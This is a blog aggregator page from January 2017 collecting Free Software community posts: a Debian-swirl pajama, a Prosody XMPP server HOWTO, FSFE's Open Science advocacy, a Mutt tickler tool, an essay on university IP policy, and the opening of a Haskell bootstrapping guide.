Planet Fellowship (en)

Sunday, 22 January 2017

New pajama

Elena ``of Valhalla'' | 15:43, Sunday, 22 January 2017

New pajama

I may have been sewing myself a new pajama.

Image/photo: http://social.gl-como.it/photos/valhalla/image/81b600789aa02a91fdf62f54a71b1ba0

It was plagued with issues: one of the sleeves is wrong side out and I only realized it when everything was almost done (luckily the pattern is symmetric and it is barely noticeable), the swirl moved while I was sewing it on (and the sewing machine got stuck multiple times: next time I'm using interfacing, full stop), and it's a bit deformed, but it's done.

For the swirl, I used Inkscape to Simplify (Ctrl-L) the original Debian Swirl a few times, removed the isolated bits, adjusted some spline nodes by hand and printed it on paper. I then cut it out, used water-soluble glue to attach it to the wrong side of a scrap of red fabric, cut the fabric, removed the paper and then pinned and sewed the fabric onto the pajama top.
As mentioned above, the next time I'm doing something like this, some interfacing will be involved somewhere, to keep me sane and the sewing machine happy.

Blogging, because it is somewhat relevant to Free Software :) and there are even sources (https://www.trueelena.org/clothing/projects/pajamas_set.html#downloads), under a DFSG-Free license :)

Thursday, 19 January 2017

Which movie most accurately forecasts the Trump presidency?

DanielPocock.com - fsfe | 19:31, Thursday, 19 January 2017

Many people have been scratching their heads wondering what the new US president will really do and what he really stands for. His alternating positions on abortion, for example, suggest he may simply be telling people what he thinks is most likely to win public support from one day to the next. Will he really waste billions of dollars building a wall? Will Muslims really be banned from the US?

As it turns out, several movies provide a thought-provoking insight into what could eventuate. What's more, the two discussed here bear a creepy resemblance to the Trump phenomenon and to many of the problems in the world today.

Countdown to Looking Glass

On the classic cold war theme of nuclear annihilation, Countdown to Looking Glass is probably far scarier to watch on Trump eve than in the era when it was made. Released in 1984, the movie follows a series of international crises that have all come to pass: the assassination of a US ambassador in the Middle East, a banking crisis and two superpowers in an escalating conflict over territory. The movie even picked a young Republican congressman for a cameo role: he subsequently went on to become Speaker of the House. To relate it to modern times, you may need to imagine it is China, not Russia, who is the adversary, but then you probably won't be able to sleep after watching it.

cleaning out the swamp?

The Omen

Another classic is The Omen. Damien Thorn, the star of this series of four horror movies, has a history that is eerily reminiscent of Trump's: born into a wealthy family; a series of disasters befalls every honest person he comes into contact with; he comes to control a vast business empire acquired by inheritance; and, as he enters the world of politics in the third movie of the series, there is a scene in the Oval Office where he is flippantly advised that he shouldn't lose any sleep over any conflict of interest arising from his business holdings. Did you notice that Damien Thorn and Donald Trump even share the same initials, DT?

Friday, 13 January 2017

Modern XMPP Server

Elena ``of Valhalla'' | 12:59, Friday, 13 January 2017

Modern XMPP Server

I've published a new HOWTO on my website: http://www.trueelena.org/computers/howto/modern_xmpp_server.html

Enrico Zini already wrote about the Why (and the What, Who and When) at http://www.enricozini.org/blog/2017/debian/modern-and-secure-instant-messaging/, so I'll just quote his conclusion and move on to the How.

I now have an XMPP setup which has all the features of the recent fancy chat systems, and on top of that it runs, client and server, on Free Software, which can be audited, it is federated and I can self-host my own server in my own VPS if I want to, with packages supported in Debian.


How



I've decided to install Prosody (https://prosody.im/), mostly because it was recommended by the RTC QuickStart Guide (http://rtcquickstart.org/); I've heard that similar results can be reached with ejabberd (https://www.ejabberd.im/) and other servers.

I'm also targeting Debian (https://www.debian.org/) stable (+ backports); as I write this, it is jessie; if there are significant differences I will update this article when I upgrade my server to stretch. Right now, this means that I'm using prosody 0.9 (and that's probably also the version that will be available in stretch).

Installation and prerequisites



You will need to enable the backports repository (https://backports.debian.org/) and then install the packages prosody and prosody-modules.
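
For reference, a minimal sketch of those two steps on jessie (assuming the jessie-backports suite and an apt-based setup; adjust the mirror and suite names to your system):

echo 'deb http://httpredir.debian.org/debian jessie-backports main' > /etc/apt/sources.list.d/backports.list
apt-get update
apt-get install -t jessie-backports prosody prosody-modules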

You also need to set up some TLS certificates (I used Let's Encrypt, https://letsencrypt.org/) and make them readable by the prosody user; see Chapter 12 of the RTC QuickStart Guide (http://rtcquickstart.org/guide/multi/xmpp-server-prosody.html) for more details.
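
As a hedged example (the Let's Encrypt client invocation, the file paths and the Debian ssl-cert group convention are assumptions on my part; use whatever matches your setup), something like the following puts the files where the virtualhost configuration below expects them and makes the key readable by prosody:

letsencrypt certonly --standalone -d chat.example.org
mkdir -p /etc/ssl/public
cp /etc/letsencrypt/live/chat.example.org/privkey.pem /etc/ssl/private/example.org-key.pem
cp /etc/letsencrypt/live/chat.example.org/fullchain.pem /etc/ssl/public/example.org.pem
chgrp ssl-cert /etc/ssl/private/example.org-key.pem
chmod 640 /etc/ssl/private/example.org-key.pem
adduser prosody ssl-cert   # let the prosody user read keys under /etc/ssl/private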

On your firewall, you'll need to open the following TCP ports:


  • 5222 (client2server)

  • 5269 (server2server)

  • 5280 (default http port for prosody)

  • 5281 (default https port for prosody)



The latter two are needed to enable some services provided via http(s), including rich media transfers.
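
For example, with a plain iptables firewall (an assumption; translate to your firewall tool of choice) the four ports can be opened with:

iptables -A INPUT -p tcp -m multiport --dports 5222,5269,5280,5281 -j ACCEPT
ip6tables -A INPUT -p tcp -m multiport --dports 5222,5269,5280,5281 -j ACCEPT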

With just a handful of users, I didn't bother to configure LDAP or anything else, but just created users manually via:

prosodyctl adduser alice@example.org

In-band registration is disabled by default (and I've left it that way, to prevent my server from being used to send spim https://en.wikipedia.org/wiki/Messaging_spam).

prosody configuration



You can then start configuring prosody by editing /etc/prosody/prosody.cfg.lua and changing a few values from the distribution defaults.

First of all, enforce the use of encryption and certificate checking both for client2server and server2server communications with:


c2s_require_encryption = true
s2s_secure_auth = true



and then, sadly, add to the whitelist any server that you want to talk to but that doesn't support the above:


s2s_insecure_domains = { "gmail.com" }


virtualhosts



For each virtualhost you want to configure, create a file /etc/prosody/conf.avail/chat.example.org.cfg.lua with contents like the following:


VirtualHost "chat.example.org"
    enabled = true
    ssl = {
        key = "/etc/ssl/private/example.org-key.pem";
        certificate = "/etc/ssl/public/example.org.pem";
    }


For the domains where you also want to enable MUCs, add the following lines:


Component "conference.chat.example.org" "muc"
restrict_room_creation = "local"


the "local" configures prosody so that only local users are allowed to create new rooms (but then everybody can join them, if the room administrator allows it): this may help reduce unwanted usages of your server by random people.

You can also add the following line to enable rich media transfers via http uploads (XEP-0363):


Component "upload.chat.trueelena.org" "http_upload"

The defaults are pretty sane, but see https://modules.prosody.im/mod_http_upload.html for details on what knobs you can configure for this module.

Don't forget to enable the virtualhost by linking the file inside /etc/prosody/conf.d/.
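
For example (using the file name from above; restarting makes prosody pick up the new virtualhost):

ln -s /etc/prosody/conf.avail/chat.example.org.cfg.lua /etc/prosody/conf.d/
prosodyctl restart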

additional modules



Most of the other interesting XEPs are enabled by loading additional modules inside /etc/prosody/prosody.cfg.lua (under modules_enabled); to enable mod_something just add a line like:


"something";

Most of these come from the prosody-modules package (and thus from https://modules.prosody.im/) and some may require changes when prosody 0.10 becomes available; where this is the case it is mentioned below.



  • mod_carbons (XEP-0280)
    To keep conversations synchronized while using multiple devices at the same time.

    This will be included by default in prosody 0.10.



  • mod_privacy + mod_blocking (XEP-0191)
    To allow user-controlled blocking of users, including as an anti-spim measure.

    In prosody 0.10 these two modules will be replaced by mod_blocklist.



  • mod_smacks (XEP-0198)
    Allow clients to resume a disconnected session before a customizable timeout and prevent message loss.



  • mod_mam (XEP-0313)
    Archive messages on the server for a limited period of time (default 1 week) and allow clients to retrieve them; this is required to synchronize message history between multiple clients.

    With prosody 0.9 only an in-memory storage backend is available, which may make this module problematic on servers with many users. prosody 0.10 will fix this by adding support for SQL-backed storage with archiving capabilities.



  • mod_throttle_presence + mod_filter_chatstates (XEP-0352)
    Filter out presence updates and chat states when the client announces (via Client State Indication) that the user isn't looking. This is useful to reduce power and bandwidth usage for "useless" traffic.




@Gruppo Linux Como @LIFO

Wednesday, 11 January 2017

Standing Strong as a Team

Marcus's Blog | 15:11, Wednesday, 11 January 2017

I work at a large university in Switzerland. We are also responsible for online exams, which are held on our GNU/Linux setup. Since bad technical things could happen during exams, we have to be available. Since last year we have had to be located in the same building where the exams are held (which is not my regular office building).

This has always been stressful to me as well, because hard crashes of the infrastructure would have a large impact. If everything goes wrong it might affect 200 to 500 students.

Today we had one of those exams and we upped our team presence to four people at 3rd level as well as at 2nd and 1st level. Everything went well, and it gave me a really good feeling that we are such a strong team and can rely on each other.

So what’s the conclusion of this post? I have learned that things that look frightening at first glance can work really smoothly if you have colleagues you can rely on. Things that might look impossible for one person alone are possible with the help of a good team and friends.

Push Free Software and Open Science for Horizon2020

English Planet – Dreierlei | 12:34, Wednesday, 11 January 2017

Summary: please help us get the idea of the importance of Free Software as a condition for Open Science into the minds of the stakeholders and decision-makers of the Horizon2020 program. You can do so by participating in the interim evaluation and re-using FSFE’s position paper.

What came to my mind the first time I read “Open Science” was that this term should not be necessary in the first place. In common understanding, as well as in its self-conception, “openness” is an elementary part of all science: “openness” in the sense that all scientific results shall be published publicly, along with the experimental settings, methods and anything else that led to them. It is exactly this approach that – in theory – gives everyone the chance to reproduce the experiment and get to the same results.

But although this approach of openness might still be the noble objective of any scientist, the general idea of a publicly available science has been called into question since at least the de facto domination of publishers over science journals and the creation of a profit-oriented market design. It is not the point of this blog post to lay out the problematic situation in which both the consumers and the content creators have to pay publishers for overpriced science journals, financed with public money. What matters most here is that these high prices are contrary to the idea of universal access to science, as they give access only to those who can afford it.

[Figure: Send and receive Open Science?]

Fortunately, Open Access came along to do something about this problem. Similar to Free Software, Open Access uses free licenses to offer access to science publications to everyone around the globe. That is why Open Access is an important step towards universal access to science. Unfortunately, in a digital world, Open Access is just one of many tools that we have to use to achieve Open Science. Equally important are the format and the software that are used. Also, Open Access only covers the final publication and misses the steps that lead up to it. This is where Open Science steps in.

Why Free Software matters in Open Science

It should be clear that Open Science – unlike Open Access – does not only relate to the form in which the results of research are published. Open Science aims to cover and open up the whole research process, from the method design to data gathering to calculations to the final publication. This means that, thanks to digitalization, for some decades now we have had a new issue in opening up the scientific process, and that is the software that is used. Software is an integral part of basically all sciences nowadays, and nearly all steps involved in a research project depend on and are covered by the use of software.

And here is the point: Proprietary software cannot offer the openness that is needed to keep scientific experiments and results transparent and reproducible. Only Free Software offers the possibility to study and reuse the software that was used for the research in question, and therewith universal access to science. Only Free Software offers transparency, and therewith the possibility to check the methods (e.g. the mathematical calculations of the software in use) that have been used to achieve the results. And only Free Software offers collaboration and independence of science while securing long-term archiving of results at the same time. (If you would like to dig deeper into the argument for why Open Science needs Free Software, read my previous blog post on this.)

How to push for Free Software in Horizon2020

Horizon2020 is the biggest public science funding programme in the European Union, run by the European Commission. Fortunately, Open Science is one of the main principles promoted by Horizon2020 to further unlock the full potential of innovation in Europe. Currently, Horizon2020 is running an interim evaluation to help formulate the next EU research and innovation funding programme post-2020. So this is the best moment to raise awareness of the importance of Free Software and Open Standards for Open Science for the next funding period.

[Figure: Horizon2020 logo, captioned “Let’s put Free and Open in Horizon 2020”]

To get this message and idea to the decision-makers inside the European Commission, we at the FSFE wrote a position paper on why Free Software matters for Open Science, including concrete proposals and best methods for implementing Free Software in the Horizon2020 framework. To further support our demands we additionally filed a Freedom of Information request with the European Commission’s Directorate-General for Research and Innovation to ask about the use, development and release of (Free) software under Horizon2020.

If you are convinced now, please help us get the idea of the importance of Free Software as a condition for Open Science into the minds of the stakeholders and decision-makers of the Horizon2020 program. You can do so by participating in the consultation and re-using FSFE’s position paper (PDF). You can literally fill in your personal details, skip all the questions and at the end upload FSFE’s position paper; this is the 5-minute option, and we have explained it for you in our wiki. Or you can read through our position paper, take it as inspiration and upload a modified version of it. Please find all the necessary information, including links to the sources, in FSFE’s wiki.

Thank you very much for helping to open up European science by using Free Software!

Boomerang for Mutt

free software - Bits of Freedom | 08:15, Wednesday, 11 January 2017

Boomerang for Mutt

If you're anything like me, an overflowing inbox stresses you. When the emails in my inbox start filling more than a screen, I lose focus. This is particularly troubling as I'm also using my inbox as a reminder about issues I need to look at: travel bookings, meetings to be booked, inquiries to be made at the right time, and so on. A lot of emails about things I don't actually need to do anything about right now.

Last week, I was delighted to find that Noah Tilton has created a convenient tool for a tickler file (as popularized by the book Getting Things Done by David Allen) for Maildir MUAs such as Mutt. If you're a bit more Gmail-snazzy, you may recognize the same concept from Boomerang for Gmail.

The basic idea is this: not everything in your INBOX needs to be acted on right now. The things which don't need to be acted on now take attention away from what you should be doing. So you want to move them away, but have them appear again at a particular time: next week, in December, tomorrow, and so on.

What Noah's tickler-mail does is it allows you to keep one Maildir folder as a tickler file. I call this one todo, so everything in ~/Maildir/todo/ is my tickler file. Within this tickler file, I save emails in a subfolder with a human-readable description, such as "next-week", "next-month", or "25th-of-december" (~/Maildir/todo/next-week/, ~/Maildir/todo/next-month/, ~/Maildir/todo/25th-of-december).

The tickler-mail utility then parses these human-readable descriptions with Python's parsedatetime library and compares the result with the change timestamp of the email. If the indicated amount of time has passed, it moves the email to the INBOX and adds an additional "X-Tickler" header to it to indicate it's a tickler file email. With this .muttrc recipe, the e-mail is then shown clearly in red so I can easily and quickly tell which emails are new and which have come in from the tickler file:

color index red black '~h "X-Tickler:.*"'
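
For illustration only, here is a rough shell sketch of the same idea. This is not Noah's tickler-mail (which uses Python's parsedatetime and also adds the X-Tickler header); the folder-name parsing with GNU date and the plain mv back into the INBOX are simplifying assumptions:

#!/bin/bash
# Sketch: move messages from ~/Maildir/todo/<relative-date>/ back to the INBOX
# once <relative-date> has passed, counted from the message's change time.
TICKLER="$HOME/Maildir/todo"
INBOX="$HOME/Maildir/INBOX"
now=$(date +%s)
for dir in "$TICKLER"/*/; do
    desc=$(basename "$dir" | tr '-' ' ')           # e.g. "next week"
    for mail in "$dir"cur/* "$dir"new/*; do
        [ -e "$mail" ] || continue
        filed=$(stat -c %Z "$mail")                # when the mail was filed
        due=$(date -d "$(date -d "@$filed" +%F) $desc" +%s 2>/dev/null) || continue
        if [ "$due" -le "$now" ]; then
            mv "$mail" "$INBOX/new/"               # reappear in the inbox
        fi
    done
done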

Monday, 09 January 2017

The Academic Barriers of Commercialisation

Paul Boddie's Free Software-related blog » English | 22:27, Monday, 09 January 2017

Last year, the university through which I obtained my degree celebrated a “milestone” anniversary, meaning that I got even more announcements, notices and other such things than I was already getting from them before. Fortunately, not everything published into this deluge is bound up in proprietary formats (as one brochure was, sitting on a Web page in Flash-only form) or only reachable via a dubious “Libyan link-shortener” (as certain things were published via a social media channel that I have now quit). It is indeed infuriating to see one of the links in a recent HTML/plain text hybrid e-mail message using a redirect service hosted on the university’s own alumni sub-site, sending the reader to a bit.ly URL, which will redirect them off into the great unknown and maybe even back to the original site. But such things are what one comes to expect on today’s Internet with all the unquestioning use of random “cloud” services, each one profiling the unsuspecting visitor and betraying their privacy to make a few extra cents or pence.

But anyway, upon following a more direct – but still redirected – link to an article on the university Web site, I found myself looking around to see what gets published there these days. Personally, I find the main university Web site rather promotional and arguably only superficially informative – you can find out the required grades to take courses along with supposed student approval ratings and hypothetical salary expectations upon qualifying – but it probably takes more digging to get at the real detail than most people would be willing to do. I wouldn’t mind knowing what they teach now in their computer science courses, for instance. I guess I’ll get back to looking into that later.

Gatekeepers of Knowledge

However, one thing did catch my eye as I browsed around the different sections, encountering the “technology transfer” department with the expected rhetoric about maximising benefits to society: the inevitable “IP” policy in all its intimidating length, together with an explanatory guide to that policy. Now, I am rather familiar with such policies from my time at my last academic employer, having been obliged to sign some kind of statement of compliance at one point, but then apparently not having to do so when starting a subsequent contract. It was not as if enlightenment had come calling at the University of Oslo between these points in time such that the “IP rights” agreement now suddenly didn’t feature in the hiring paperwork; it was more likely that such obligations had presumably been baked into everybody’s terms of employment as yet another example of the university upper management’s dubious organisational reform and questionable human resources practices.

Back at Heriot-Watt University, credit is perhaps due to the authors of their explanatory guide to try and explain the larger policy document, because it is most likely that most people aren’t going to get through that much longer document and retain a clear head. But one potentially unintended reason for credit is that by being presented with a much less opaque treatment of the policy and its motivations, we are able to see with enhanced clarity many of the damaging misconceptions that have sadly become entrenched in higher education and academia, including the ways in which such policies actually do conflict with the sharing of knowledge that academic endeavour is supposed to be all about.

So, we get the sales pitch about new things needing investment…

However, often new technologies and inventions are not fully developed because development needs investment, and investment needs commercial returns, and to ensure commercial returns you need something to sell, and a freely available idea cannot be sold.

If we ignore various assumptions about investment or the precise economic mechanisms supposedly required to bring about such investment, we can immediately note that ideas on their own aren’t worth anything anyway, freely available or not. Although the Norwegian Industrial Property Office (or the Norwegian Patent Office if we use a more traditional name) uses the absurd vision slogan “turning ideas into values” (it should probably read “value”, but whatever), this perhaps says more about greedy profiteering through the sale of government-granted titles bound to arbitrary things than it does about what kinds of things have any kind of inherent value that you can take to the bank.

But assuming that we have moved beyond the realm of simple ideas and have entered the realm of non-trivial works, we find that we have also entered the realm of morality and attitude management:

That is why, in some cases, it is better for your efforts not to be published immediately, but instead to be protected and then published, for protection gives you something to sell, something to sell can bring in investment, and investment allows further development. Therefore in the interests of advancing the knowledge within the field you work in, it is important that you consider the commercial potential of your work from the outset, and if necessary ensure it is properly protected before you publish.

Once upon a time, the most noble pursuit in academic research was to freely share research with others so that societal, scientific and technological progress could be made. Now it appears that the average researcher should treat it as their responsibility to conceal their work from others, seek “protection” on it, and then release the encumbered details for mere perusal and the conditional participation of those once-valued peers. And they should, of course, be wise to the commercial potential of the work, whatever that is. Naturally, “intellectual property” offices in such institutions have an “if in doubt, see us” policy, meaning that they seek to interfere with research as soon as possible, and should someone fail to have “seen them”, that person’s loyalty may very well be called into question as if they had somehow squandered their employer’s property. In some institutions, this could very easily get people marginalised or “reorganised” if not immediately or obviously fired.

The Rewards of Labour

It is in matters of property and ownership where things get very awkward indeed. Many people would accept that employees of an organisation are producing output that becomes the property of that organisation. What fewer people might accept is that the customers of an organisation are also subject to having their own output taken to be the property of that organisation. The policy guide indicates that even undergraduate students may also be subject to an obligation to assign ownership of their work to the university: those visiting the university supposedly have to agree to this (although it doesn’t say anything about what their “home institution” might have to say about that), and things like final year projects are supposedly subject to university ownership.

So, just because you as a student have a supervisor bound by commercialisation obligations, you end up not only paying tuition fees to get your university education (directly or through taxation), but you also end up having your own work taken off you because it might be seen as some element in your supervisor’s “portfolio”. I suppose this marks a new low in workplace regulation and standards within a sector that already skirts the law with regard to how certain groups are treated by their employers.

One can justifiably argue that employees of academic institutions should not be allowed to run away with work funded by those institutions, particularly when such funding originally comes from other sources such as the general public. After all, such work is not exactly the private property of the researchers who created it, and to treat it as such would deny it to those whose resources made it possible in the first place. Any claims about “rightful rewards” needing to be given are arguably made to confuse rational thinking on the matter: after all, with appropriate salaries, the researchers are already being rewarded doing work that interests and stimulates them (unlike a lot of people in the world of work). One can argue that academics increasingly suffer from poorer salaries, working conditions and career stability, but such injustices are not properly remedied by creating other injustices to supposedly level things out.

A policy around what happens with the work done in an academic institution is important. But just as individuals should not be allowed to treat broadly-funded work as their own private property, neither should the institution itself claim complete ownership and consider itself entitled to do what it wishes with the results. It may be acting as a facilitator to allow research to happen, but by seeking to intervene in the process of research, it risks acting as an inhibitor. Consider the following note about “confidential information”:

This is, in short, anything which, if you told people about, might damage the commercial interests of the university. It specifically includes information relating to intellectual property that could be protected, but isn’t protected yet, and which if you told people about couldn’t be protected, and any special know how or clever but non patentable methods of doing things, like trade secrets. It specifically includes all laboratory notebooks, including those stored in an electronic fashion. You must be very careful with this sort of information. This is of particular relevance to something that may be patented, because if other people know about it then it can’t be.

Anyone working in even a moderately paranoid company may have read things like this. But here the context is an environment where knowledge should be shared to benefit and inform the research community. Instead, one gets the impression that the wish to control the propagation of knowledge is so great that some people would rather see the details of “clever but non patentable methods” destroyed than passed on openly for others to benefit from. Indeed, one must question whether “trade secrets” should even feature in a university environment at all.

Of course, the obsession with “laboratory notebooks”, “methods of doing things” and “trade secrets” in such policies betrays the typical origins of such drives for commercialisation: the apparently rich pickings to be had in the medical, pharmaceutical and biosciences domains. It is hardly a coincidence that the University of Oslo intensified its dubious “innovation” efforts under a figurehead with a background (or an interest) in exactly those domains: with a narrow personal focus, an apparent disdain for other disciplines, and a wider commercial atmosphere that gives such a strategy a “dead cert” air of impending fortune, we should perhaps expect no more of such a leadership creature (and his entourage) than the sum of that creature’s instincts and experiences. But then again, we should demand more from such people when their role is to cultivate an institution of learning and not to run a private research organisation at the public’s expense.

The Dirty Word

At no point in the policy guide does the word “monopoly” appear. Given that such a largely technical institution would undoubtedly be performing research where the method of “protection” would involve patents being sought, omitting the word “monopoly” might be that document’s biggest flaw. Heriot-Watt University originates from the merger of two separate institutions, one of which was founded by the well-known pioneer of steam engine technology, James Watt.

Recent discussion of Watt’s contributions to the development and proliferation of such technology has brought up claims that Watt’s own patents – the things that undoubtedly made him wealthy enough to fund an educational organisation – actually held up progress in the domain concerned for a number of decades. While he was clearly generous and sensible enough to spend his money on worthy causes, one can always challenge whether the questionable practices that resulted in the accumulation of such wealth can justify the benefits from the subsequent use of that wealth, particularly if those practices can be regarded as having had negative effects on society and may even have increased wealth inequality.

Questioning philanthropy is not a particularly fashionable thing to do. In capitalist societies, wealthy people are often seen as having made their fortunes in an honest fashion, enjoying a substantial “benefit of the doubt” that this was what really occurred. Criticising a rich person giving money to ostensibly good causes is seen as unkind to both the generous donor and to those receiving the donations. But we should question the means through which the likes of Bill Gates (in our time) and James Watt (in his own time) made their fortunes and the power that such fortunes give to such people to direct money towards causes of their own personal choosing, not to mention the way in which wealthy people also choose to influence public policy and the use of money given by significantly less wealthy individuals – the rest of us – gathered through taxation.

But back to monopolies. Can they really be compatible with the pursuit and sharing of knowledge that academia is supposed to be cultivating? Just as it should be shocking that secretive “confidentiality” rules exist in an academic context, it should appal us that researchers are encouraged to be competitively hostile towards their peers.

Removing the Barriers

It appears that some well-known institutions understand that the unhindered sharing of their work is their primary mission. MIT Media Lab now encourages the licensing of software developed under its roof as Free Software, not requiring special approval or any other kind of institutional stalling that often seems to take place as the “innovation” vultures pick over the things they think should be monetised. Although proprietary licensing still appears to be an option for those within the Media Lab organisation, at least it seems that people wanting to follow their principles and make their work available as Free Software can do so without being made to feel bad about it.

As an academic institution, we believe that in many cases we can achieve greater impact by sharing our work.

So says the director of the MIT Media Lab. It says a lot about the times we live in that this needs to be said at all. Free Software licensing is, as a mechanism to encourage sharing, a natural choice for software, but we should also expect similar measures to be adopted for other kinds of works. Papers and articles should at the very least be made available using content licences that permit sharing, even if the licence variants chosen by authors might seek to prohibit the misrepresentation of parts of their work by prohibiting remixes or derived works. (This may sound overly restrictive, but one should consider the way in which scientific articles are routinely misrepresented by climate change and climate science deniers.)

Free Software has encouraged an environment where sharing is safely and routinely done. Licences like the GNU General Public Licence seek to shield recipients from things like patent threats, particularly from organisations which might appear to want to share their works, but which might be tempted to use patents to regulate the further use of those works. Even in realms where patents have traditionally been tolerated, attempts have been made to shield others from the effects of patents, intended or otherwise: the copyleft hardware movement demands that shared hardware designs are patent-free, for instance.

In contrast, one might think that despite the best efforts of the guide’s authors, all the precautions and behavioural self-correction it encourages might just drive the average researcher to distraction. Or, just as likely, to ignoring most of the guidelines and feigning ignorance if challenged by their “innovation”-obsessed superiors. But in the drive to monetise every last ounce of effort there is one statement that is worth remembering:

If intellectual property is not assigned, this can create problems in who is allowed to exploit the work, and again work can go to waste due to a lack of clarity over who owns what.

In other words, in an environment where everybody wants a share of the riches, it helps to have everybody’s interests out in the open so that there may be no surprises later on. Now, it turns out that unclear ownership and overly casual management of contributions is something that has occasionally threatened Free Software projects, resulting in more sophisticated thinking about how contributions are managed.

And it is precisely this combination of Free Software licensing, or something analogous for other domains, with proper contribution and attribution management that will extend safe and efficient sharing of knowledge to the academic realm. Researchers just cannot have the same level of confidence when dealing with the “technology transfer” offices of their institution and of other institutions. Such offices only want to look after themselves while undermining everyone beyond the borders of their own fiefdoms.

Divide and Rule

It is unfortunate that academic institutions feel that they need to “pull their weight” and have to raise funds to make up for diminishing public funding. By turning their backs on the very reason for their own existence and seeking monopolies instead of sharing knowledge, they unwittingly participate in the “divide and rule” tactics blatantly pursued in the political arena: that everyone must fight each other for all that is left once the lion’s share of public funding has been allocated to prestige megaprojects and schemes that just happen to benefit the well-connected, the powerful and the influential people in society the most.

A properly-funded education sector is an essential component of a civilised society, and its institutions should not be obliged to “sharpen their elbows” in the scuffle for funding and thus deprive others of knowledge just to remain viable. Sadly, while austerity politics remains fashionable, it may be up to us in the Free Software realm to remind academia of its obligations and to show that sustainable ways of sharing knowledge exist and function well in the “real world”.

Indeed, it is up to us to keep such institutions honest and to prevent advocates of monopoly-driven “innovation” from being able to insist that their way is the only way, because just as “divide and rule” politics erects barriers between groups in wider society, commercialisation erects barriers that inhibit the essential functions of academic pursuit. And such barriers ultimately risk extinguishing academia altogether, along with all the benefits its institutions bring to society. If my university were not reinforcing such barriers with its “IP” policy, maybe its anniversary as a measure of how far we have progressed from monopolies and intellectual selfishness would have been worth celebrating after all.

Sunday, 08 January 2017

Bootstrapping Haskell: part 1

Rekado | 23:00, Sunday, 08 January 2017

Haskell is a formally specified language with potentially many alternative implementations, but in early 2017 the reality is that Haskell is whatever the Glasgow Haskell Compiler (GHC) implements. Unfortunately, to build GHC one needs a previous version of GHC. This is true for all public releases of GHC all the way back to version 0.29, which was released in 1996 and which implements Haskell 1.2. Some GHC releases include files containing generated ANSI C code, which require only a C compiler to build. For most purposes, generated code does not qualify as source code.

So I wondered: is it possible to construct a procedure to build a modern release of GHC from source without depending on any generated code or pre-built binaries of an older variant of GHC? The answer to this question depends on the answers to a number of related questions. One of them is: are there any alternative Haskell implementations that are still usable today and that can be built without GHC?

A short survey of Haskell implementations

Although nowadays hardly anyone uses any other Haskell compiler but GHC in production, there are some alternative Haskell implementations that were protected from bit rot and thus can still be built from source with today’s common toolchains.

One of the oldest implementations is Yale Haskell, a Haskell system embedded in Common Lisp. The last release of Yale Haskell was version 2.0.5 in the early 1990s [1]. Yale Haskell runs on top of CMU Common Lisp, Lucid Common Lisp, Allegro Common Lisp, or Harlequin LispWorks, but since I do not have access to any of these proprietary Common Lisp implementations, I ported the Yale Haskell system to GNU CLISP. The code for the port is available here. Yale Haskell is not a compiler; it can only be used as an interpreter.

Another Haskell interpreter with a more recent release is Hugs. Hugs is written in C and implements almost all of the Haskell 98 standard. It also comes with a number of useful language extensions that GHC and other Haskell systems depend on. Unfortunately, it cannot deal with mutually recursive module dependencies, which is a feature that even the earliest versions of GHC rely on. This means that running a variant of GHC inside of Hugs is not going to work without major changes.

An alternative Haskell compiler that does not need to be built with GHC is nhc98. Its latest release was in 2010, which is much more recent than any of the other Haskell implementations mentioned so far. nhc98 is written in Haskell, so a Haskell compiler or interpreter is required to build it. Like GHC the release of nhc98 comes with files containing generated C code, but depending on them for a clean bootstrap is almost as bad as depending on a third-party binary. Sadly, nhc98 has another shortcoming: it is restricted to 32-bit machine architectures.

An early bootstrapping idea

Since nhc98 is written in C (the runtime) and standard Haskell 98, we can run the Haskell parts of the compiler inside of a Haskell 98 interpreter. Luckily, we have an interpreter that fits the bill: Hugs! If we can interpret and run enough parts of nhc98 with Hugs we might be able to use nhc98 on Hugs to build a native version of nhc98 and related tools (such as cpphs, hmake, and cabal). Using the native compiler we can build a complete toolchain and just maybe that’s enough to build an early version of GHC. Once we have an early version of GHC we can go ahead and build later versions with ease. (Building GHC directly using nhc98 on Hugs might also work, but due to complexity in GHC modules it seems better to avoid depending on Hugs at runtime.)

At this point I have verified that (with minor modifications) nhc98 can indeed be run on top of Hugs and that (with enough care to pre-processing and dependency ordering) it can build a native library from the Haskell source files of the nhc98 prelude. It is not clear whether nhc98 would be capable of building a version of GHC and how close to a modern version of GHC we can get with just nhc98. There are also problems with the nhc98 runtime on modern x86_64 systems (more on that at the end).

Setting up the environment

Before we can start let’s prepare a suitable environment. Since nhc98 can only be used on 32-bit architectures we need a GCC toolchain for i686. With GNU Guix it’s easy to set up a temporary environment containing just the right tools: the GCC toolchain, make, and Hugs.

guix environment --system=i686-linux \
                 --ad-hoc gcc-toolchain@4 make hugs

Building the runtime

Now we can configure nhc98 and build the C runtime, which is needed to link the binary objects that nhc98 and GCC produce when compiling Haskell sources. Configuration is easy:

cd /path/to/nhc98-1.22
export NHCDIR=$PWD
./configure

Next, we build the C runtime:

cd src/runtime
make

This produces binary objects in an architecture-specific directory. In my case this is targets/x86_64-Linux.

Building the prelude?

The standard library in Haskell is called the prelude. Most source files of nhc98 depend on the prelude in one way or another. Although Hugs comes with its own prelude it is of little use for our purposes as components of nhc98 must be linked with a static prelude library object. Hugs does not provide a suitable object that we could link to.

To build the prelude we need a Haskell compiler that has the same call interface as nhc98. Interestingly, much of the nhc98 compiler’s user interface is implemented as a shell script, which after extensive argument processing calls nhc98comp to translate Haskell source files into C code, and then runs GCC over the C files to create binary objects. Since we do not have nhc98comp at this point, we need to fake it with Hugs (more on that later).

Detour: cpphs and GreenCard

Unfortunately, this is not the only problem. Some of the prelude’s source files require pre-processing by a tool called GreenCard, which generates boilerplate FFI code. Of course, GreenCard is written in Haskell. Since we cannot build a native GreenCard binary without the native nhc98 prelude library, we need to make GreenCard run on Hugs. Some of the GreenCard sources require pre-processing with cpphs. Luckily, that’s just a really simple Haskell script, so running it in Hugs is trivial. We will need cpphs later again, so it makes sense to write a script for it. Let’s call it hugs-cpphs and drop it in ${NHCDIR}.

#!/bin/bash

runhugs ${NHCDIR}/src/cpphs/cpphs.hs --noline -D__HASKELL98__ "$@"

Make it executable:

chmod +x hugs-cpphs

Okay, let’s first pre-process the GreenCard sources with cpphs. To do that I ran the following commands:

cd ${NHCDIR}/src/greencard

CPPPRE="${NHCDIR}/hugs-cpphs -D__NHC__"

FILES="DIS.lhs \
 HandLex.hs \
 ParseLib.hs \
 HandParse.hs \
 FillIn.lhs \
 Proc.lhs \
 NHCBackend.hs \
 NameSupply.lhs \
 Process.lhs"

for file in $FILES; do
    cp $file $file.original && $CPPPRE $file.original > $file && rm $file.original
done

